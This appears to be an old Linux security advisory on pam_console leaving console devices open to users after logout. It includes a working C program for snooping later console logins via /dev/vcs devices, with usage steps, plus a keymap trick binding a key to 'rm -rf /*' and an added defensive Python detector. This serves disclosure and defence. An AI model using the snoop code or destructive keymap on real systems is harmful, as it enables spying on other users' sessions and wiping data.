COMMAND
tty
SYSTEMS AFFECTED
Linux
PROBLEM
Michal Zalewski found the following. When accepting a luser console
login, pam_console (called by /bin/login) tries to be user-friendly
by doing several chowns on devices such as the login tty and the
corresponding vcs[a] device, as well as other interesting devices:
fd*, audio devices (dsp*, mixer*, audio*, midi*, sequencer), cdrom,
streamer/zip drive devices, frame buffer devices, kbd*, js*,
video*, radio*, winradio*, vtx*, vbi* and so on. It is probably
designed to make console logins more comfortable, but it has DEADLY
effects on servers with console luser-login ability (and that's
quite common).
On logout, these devices are chown'ed back to root, but unlike
/dev/tty[0-9], these devices have no hangup mechanism, so the user
keeps full control over them after logout simply by opening them
before logging out and holding on to the file descriptor. The
easiest attack is read-write snooping of consoles. Log in on the
console once, open /dev/vcsX (where X corresponds to the tty
number), then log out. With a continuous lseek/read loop, your
program will be able to snoop further logins on this console -
forever. It is also possible to write() to the snooped console...
Ugh. Other possibilities include reading any inserted CD,
reading/writing any inserted floppy, messing with video/audio
devices and so on, all in the same way.
Minimal tty snoop exploit:
#include <fcntl.h>
#include <unistd.h>

/* Poll the vcs device named in argv[1] and mirror its contents to stdout. */
int main(int argc, char *argv[]) {
    char buf[80 * 24];              /* one 80x24 screen of characters */
    int f;
    if (argc < 2 || (f = open(argv[1], O_RDWR)) < 0)
        return 1;
    while (1) {
        lseek(f, 0, SEEK_SET);      /* rewind to the top-left corner */
        read(f, buf, sizeof(buf));
        write(1, "\033[2J\033[H", 7); /* clear terminal, vt100/linux/ansi */
        write(1, buf, sizeof(buf));
        usleep(10000);
    }
    return 0;
}
Log onto the console; let's say it's tty3. Then compile and launch
this program inside screen, giving it the path to the vcs device
corresponding to your login tty (in this case, /dev/tty3). Detach
the screen session and log out. Wait some time, log in remotely to
your account and resume the screen session. You should see a
real-time dump of tty3.
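The defensive counterpart, as an added example that is not part of the original advisory: a check that lists processes still holding a file descriptor on one of the console devices named above after pam_console has handed the device back to root. The device-name pattern and the sample /proc snapshot are constructed for the example; snapshot_proc() reads the live /proc on a Linux host.

```python
"""Find processes whose open fds on console devices outlived the ownership
pam_console granted at console login (the lingering-fd problem above)."""
import os
import re

# Device names pam_console hands to the console user, per the advisory.
# Constructed pattern for this example, not pam_console's own config.
CONSOLE_DEVICES = re.compile(
    r"^/dev/(vcsa?\d*|tty\d+|fd\d+|dsp\d*|mixer\d*|audio\d*|midi\d*|"
    r"sequencer\d*|cdrom\d*|fb\d*|kbd\d*|js\d*|video\d*|radio\d*|"
    r"vtx\d*|vbi\d*)$"
)

def lingering_fds(procs, owners):
    """procs: {pid: (uid, [fd targets])}; owners: {device path: owner uid}.
    Return (pid, uid, device) for every open console device whose current
    owner is not the holding process's uid, i.e. access that survived the
    chown back to root on logout."""
    hits = []
    for pid, (uid, targets) in procs.items():
        for dev in targets:
            if CONSOLE_DEVICES.match(dev) and owners.get(dev, -1) != uid:
                hits.append((pid, uid, dev))
    return hits

def snapshot_proc():
    """Build the procs/owners maps from the live /proc (Linux only)."""
    procs, owners = {}, {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            uid = os.stat(f"/proc/{pid}").st_uid
            fds = os.listdir(f"/proc/{pid}/fd")
            targets = [os.readlink(f"/proc/{pid}/fd/{fd}") for fd in fds]
        except OSError:
            continue  # process exited, or not ours to inspect
        procs[int(pid)] = (uid, targets)
        for dev in targets:
            if dev.startswith("/dev/") and dev not in owners:
                try:
                    owners[dev] = os.stat(dev).st_uid
                except OSError:
                    pass
    return procs, owners

# Constructed sample: uid 500 has logged out, /dev/vcs3 is root's again,
# but the detached screen session (pid 4242) still has it open.
SAMPLE_PROCS = {1: (0, ["/dev/console"]),
                4242: (500, ["/dev/vcs3", "/dev/pts/2"]),
                4300: (500, ["/dev/pts/2"])}
SAMPLE_OWNERS = {"/dev/console": 0, "/dev/vcs3": 0, "/dev/pts/2": 500}
```

Running lingering_fds() over snapshot_proc() on a real host reports the same triple for any vcs, floppy or sound device a logged-out console user is still holding.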
Benjamin Smee found something similar a while back, relating to
the keymaps in RH6.1. Log in as a normal user (this only worked
when logging in on the console). He could then write a keymap with
strategic keys, for example the tilde key, bound to "rm -rf /*",
and then load it (on a default Red Hat 6.1, at any rate):
bash$ loadkeys example.kmap
As a NORMAL user this would load the keymap for ALL consoles.
Initially Benjamin didn't think it was anything new, since in the
man page he found:
BUGS
Note that anyone having read access to /dev/console can
run loadkeys and thus change the keyboard layout, possibly
making it unusable. Note that the keyboard translation
table is common for all the virtual consoles, so any
changes to the keyboard bindings affect all the virtual
consoles simultaneously.
but then he checked the permissions:
[~]$ ls -la /dev/console
crw------- 1 root root 5, 1 May 2 09:58 /dev/console
[bsmee]-[pts/2]-[maelstrom]-[11:13:02]-[05/04/00]
[~]$
Needless to say, a normal user should not have permission to do
this for the entire console.
tty users may, for example, issue the PIO_CMAP ioctl, rendering all
consoles unusable. Many dangerous ioctls are available to any user
who simply holds an open fd to /dev/ttyX; fortunately ioctl() can
only be called while you are logged in on the console, because
logout causes a hangup of the tty device. To do it again, you must
log in locally one more time.
SOLUTION
Nothing yet.